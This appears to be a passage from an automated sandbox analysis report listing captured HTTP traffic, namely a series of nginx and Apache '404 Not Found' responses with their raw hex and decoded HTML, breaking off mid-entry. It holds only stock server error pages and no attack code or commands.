                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Oct 2024 15:56:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Oct 2024 15:56:33 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Oct 2024 15:56:37 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Oct 2024 15:56:39 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 15:56:45 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 15:56:48 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 15:56:51 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 15:56:53 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Oct 2024 15:57:13 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Oct 2024 15:57:16 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Oct 2024 15:57:19 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Oct 2024 15:57:21 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 